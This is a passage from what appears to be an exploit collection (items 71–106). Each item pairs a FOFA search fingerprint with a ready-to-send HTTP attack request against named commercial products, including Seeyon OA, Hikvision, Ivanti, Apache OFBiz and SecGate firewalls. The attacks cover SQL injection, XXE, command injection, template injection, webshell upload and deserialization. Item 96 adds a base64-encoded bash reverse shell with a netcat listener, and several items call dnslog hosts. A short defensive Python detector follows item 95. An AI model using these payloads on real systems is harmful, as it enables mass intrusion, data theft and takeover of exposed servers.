SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园服务管理平台 service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 flow-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀软件 DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is shown below; it plants a Godzilla (哥斯拉) webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御安全网关 aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联FE协作办公平台 editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视IP网络对讲广播系统 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视运行管理中心 session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神SecGate3600防火墙 app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi An Xin NetGod (网神) SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Verify the upload by fetching the file just uploaded:
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated base64 into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

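Added example, not part of the original list or of OFBiz itself: a Python check for the two ingredients of the request above, which a WAF rule or a request-log review can key on. The first is the authentication bypass in the request target (a ';' path parameter after the controller path, and requirePasswordChange=Y with blank credentials); the second is a <serializable> element in the Apache XML-RPC extensions namespace whose base64 content begins with the Java serialization stream header (0xAC ED 00 05), which is what the ysoserial output starts with. The sample request is constructed here from the PoC; the blob is a stand-in that carries only that header, not a gadget chain. Function names are mine.

```python
import base64
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

XMLRPC_EXT_NS = "http://ws.apache.org/xmlrpc/namespaces/extensions"
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"  # ObjectOutputStream stream header


def auth_bypass_in_target(target: str) -> bool:
    """True when the request target carries either trick the PoC above relies on:
    a ';' path parameter after the controller path, or requirePasswordChange=Y
    alongside blank credentials."""
    parts = urlsplit(target)
    has_path_param = ";" in parts.path
    qs = parse_qs(parts.query, keep_blank_values=True)
    forced_change = qs.get("requirePasswordChange", [""])[0].upper() == "Y"
    return has_path_param or forced_change


def serializable_blobs(body: str):
    """Decode every <serializable> element in the XML-RPC extensions namespace."""
    root = ET.fromstring(body)
    blobs = []
    for el in root.iter("{%s}serializable" % XMLRPC_EXT_NS):
        text = "".join((el.text or "").split())  # tolerate wrapped base64
        try:
            blobs.append(base64.b64decode(text, validate=True))
        except ValueError:
            blobs.append(b"")  # undecodable: still counted, but not Java
    return blobs


def inspect_xmlrpc(target: str, body: str) -> dict:
    """Summarise what the request carries; any True here deserves a block/alert."""
    blobs = serializable_blobs(body)
    return {
        "auth_bypass": auth_bypass_in_target(target),
        "serializable_count": len(blobs),
        "java_serialized": any(b.startswith(JAVA_SERIAL_MAGIC) for b in blobs),
    }


# Constructed sample: request line and body from the PoC above, with the
# [base64 of the payload] placeholder filled by a stand-in that only carries the
# Java stream header (no gadget chain).
SAMPLE_TARGET = "/webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y"
STANDIN_BLOB = base64.b64encode(JAVA_SERIAL_MAGIC + b"\x73\x72\x00\x05dummy").decode()
SAMPLE_BODY = """<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params><param><value><struct><member>
    <name>test</name>
    <value><serializable xmlns="%s">%s</serializable></value>
  </member></struct></value></param></params>
</methodCall>""" % (XMLRPC_EXT_NS, STANDIN_BLOB)

# A normal XML-RPC call for comparison (also constructed).
BENIGN_BODY = """<?xml version="1.0"?>
<methodCall><methodName>system.listMethods</methodName><params/></methodCall>"""

if __name__ == "__main__":
    print(inspect_xmlrpc(SAMPLE_TARGET, SAMPLE_BODY))
    print(inspect_xmlrpc("/webtools/control/xmlrpc", BENIGN_BODY))
```

The <serializable> extension is the deserialization sink, so the namespace check is the stable signal; the URL tricks change between the OFBiz bypass CVEs, which is why the two checks are reported separately.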
96. Apache OFBiz 18.12.11 Groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on the Kali host:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 136

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast (盈可视) HD Intelligent Recording and Broadcasting System busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 176
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the following XML, which declares an external parameter entity and dereferences it; the DNS/HTTP callback to the dnslog host is the out-of-band proof:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. TOTOLINK T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
